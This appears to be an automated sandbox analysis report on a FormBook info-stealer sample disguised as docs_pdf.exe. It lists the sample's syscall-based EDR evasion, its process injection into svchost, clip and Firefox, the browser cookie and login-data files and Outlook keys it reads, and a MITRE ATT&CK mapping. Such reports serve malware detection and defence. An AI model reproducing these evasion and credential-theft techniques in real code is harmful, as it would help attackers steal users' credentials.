            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034649D0 mov eax, dword ptr fs:[00000030h]1_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA9D3 mov eax, dword ptr fs:[00000030h]1_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE9E0 mov eax, dword ptr fs:[00000030h]1_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov esi, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03442840 mov ecx, dword ptr fs:[00000030h]1_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460854 mov eax, dword ptr fs:[00000030h]1_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC810 mov eax, dword ptr fs:[00000030h]1_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov ecx, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A830 mov eax, dword ptr fs:[00000030h]1_2_0346A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E8C0 mov eax, dword ptr fs:[00000030h]1_2_0345E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035008C0 mov eax, dword ptr fs:[00000030h]1_2_035008C0
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_010081F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_010081F7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FDA395
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDA364 SetUnhandledExceptionFilter,0_2_00FDA364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtOpenKeyEx: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtQueryValueKey: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 5676Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\docs_pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2AD2008Jump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01008C93 LogonUserW,0_2_01008C93
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FB3B4C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FB4A35
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01014F21 mouse_event,0_2_01014F21
            Source: C:\Users\user\Desktop\docs_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_010081F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_010081F7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01014C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_01014C03
            Source: docs_pdf.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: docs_pdf.exe, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765590970.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914720150.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906984344.0000000001061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765590970.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914720150.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906984344.0000000001061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765590970.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914720150.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906984344.0000000001061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765590970.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914720150.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906984344.0000000001061000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FD886B cpuid 0_2_00FD886B
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FE50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FE50D7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FF2230 GetUserNameW,0_2_00FF2230
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FE418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FE418A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FB4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FB4AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: docs_pdf.exeBinary or memory string: WIN_81
            Source: docs_pdf.exeBinary or memory string: WIN_XP
            Source: docs_pdf.exeBinary or memory string: WIN_XPe
            Source: docs_pdf.exeBinary or memory string: WIN_VISTA
            Source: docs_pdf.exeBinary or memory string: WIN_7
            Source: docs_pdf.exeBinary or memory string: WIN_8
            Source: docs_pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01026596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_01026596
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01026A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_01026A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
